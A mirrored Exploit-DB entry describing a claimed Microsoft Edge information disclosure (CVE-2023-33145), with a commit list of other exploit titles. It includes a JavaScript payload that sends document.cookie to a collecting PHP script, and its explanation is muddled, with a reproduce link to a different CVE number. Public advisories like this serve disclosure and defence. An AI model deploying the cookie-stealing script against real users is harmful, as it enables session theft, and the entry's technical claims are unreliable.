bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/local/51571.txt
Exploit-DB 3a3c03321c DB: 2023-07-20 
18 changes to exploits/shellcodes/ghdb

Hikvision Hybrid SAN Ds-a71024 Firmware - Multiple Remote Code Execution

ABB FlowX v4.00 - Exposure of Sensitive Information

TP-Link TL-WR740N - Authenticated Directory Transversal

Microsoft Edge 114.0.1823.67 (64-bit) - Information Disclosure

Backdrop Cms v1.25.1 - Stored Cross-Site Scripting (XSS)
Blackcat Cms v1.4 - Remote Code Execution (RCE)
Blackcat Cms v1.4 - Stored XSS
CmsMadeSimple v2.2.17 - Remote Code Execution (RCE)
CmsMadeSimple v2.2.17 - session hijacking via Server-Side Template Injection (SSTI)
CmsMadeSimple v2.2.17 - Stored Cross-Site Scripting (XSS)

Joomla! com_booking component 2.4.9 - Information Leak (Account enumeration)

Online Piggery Management System v1.0 - unauthenticated file upload vulnerability

phpfm v1.7.9 - Authentication type juggling

PimpMyLog v1.7.14 - Improper access control

PMB 7.4.6 - SQL Injection

Statamic 4.7.0 - File-Inclusion

Vaidya-Mitra 1.0 - Multiple SQLi
2023-07-20 00:16:46 +00:00

52 lines
No EOL
1.5 KiB
Text
Raw Permalink Blame History

## Title:Microsoft Edge 114.0.1823.67 (64-bit) - Information Disclosure
## Author: nu11secur1ty
## Date: 07.06.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en-us/edge?form=MA13FJ&exp=e415
## Reference: https://portswigger.net/web-security/information-disclosure,
https://www.softwaresecured.com/stride-threat-modeling/
## CVE-2023-33145
## Description:
The type of information that could be disclosed if an attacker
successfully exploited this vulnerability is data inside the targeted
website like IDs, tokens, nonces, cookies, IP, User-Agent, and other
sensitive information.
The user would have to click on a specially crafted URL to be
compromised by the attacker.
In this example, the attacker use STRIDE Threat Modeling to spoof the
victim to click on his website and done.
This will be hard to detect.
## Conclusion:
Please be careful, for suspicious sites or be careful who sending you
an link to open!
## Staus: HIGH Vulnerability
[+]Exploit:
- Exploit Server:
```js
## This is a Get request from the server when the victims click! And
it is enough to understand this vulnerability! =)
<script> var i = new Image();
i.src="PoCsess.php?cookie="+escape(document.cookie)</script>
## WARNING: The PoCsess.php will be not uploaded for security reasons!
## BR nu11secur1ty
```
## Reproduce:
[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33146)
## Proof and Exploit
[href](https://www.nu11secur1ty.com/2023/07/cve-2023-33145-microsoft-edge.html)
## Time spend:
01:30:00
Reference in a new issue View git blame Copy permalink